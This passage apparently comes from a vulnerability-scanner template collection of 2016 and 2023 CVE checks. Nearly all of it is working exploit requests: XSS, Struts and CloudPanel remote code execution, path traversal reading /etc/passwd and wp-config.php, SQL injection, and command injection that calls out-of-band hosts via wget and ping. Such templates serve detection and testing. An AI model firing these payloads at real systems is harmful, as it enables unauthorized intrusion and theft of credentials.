Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Forget About Shortcode Buttons ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/scoreme/style"]}]},{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["New Year Firework ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WHIZZ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-Parsi Admin Font Editor","MW Font Changer"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Defa Online Image Protector"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["anti plagiarism","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10956","info":{"name":"WordPress Mail Masta 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd","{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ajax Random Post"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Tidio Gallery","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Admin Font Editor"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simpel Reserveren","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5674","info":{"name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id","{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, 'Debugging Center')","regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'Debugging Center')","contains(body_2, 'Windows IP')"],"condition":"and"}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["CM Tooltip Glossary"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/pondol-formmail/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Easy Contact Form Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/heat-trackr/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Hero Maps Pro ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30013","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"command\":\"127.0.0.1; ls>../{{randstr}};#\",\"num\":\"230\",\"topicurl\":\"setTracerouteCfg\"}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["lan_ip","reserv"],"condition":"and"},{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_5","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-43795","info":{"name":"GeoServer WPS - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<wps:Execute version=\"1.0.0\" service=\"WPS\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n  xmlns=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:wfs=\"http://www.opengis.net/wfs\"\n  xmlns:wps=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n  xmlns:gml=\"http://www.opengis.net/gml\"\n  xmlns:ogc=\"http://www.opengis.net/ogc\"\n  xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\"\n  xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n        xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n  <ows:Identifier>JTS:area</ows:Identifier>\n  <wps:DataInputs>\n    <wps:Input>\n      <ows:Identifier>geom</ows:Identifier>\n      <wps:Reference mimeType=\"application/json\" xlink:href=\"https://{{oast}}\" method=\"GET\">\n        <wps:Header key=\"{{string}}\" value=\"{{value}}\"/>\n      </wps:Reference>\n    </wps:Input>\n  </wps:DataInputs>\n  <wps:ResponseForm>\n    <wps:RawDataOutput>\n      <ows:Identifier>result</ows:Identifier>\n    </wps:RawDataOutput>\n  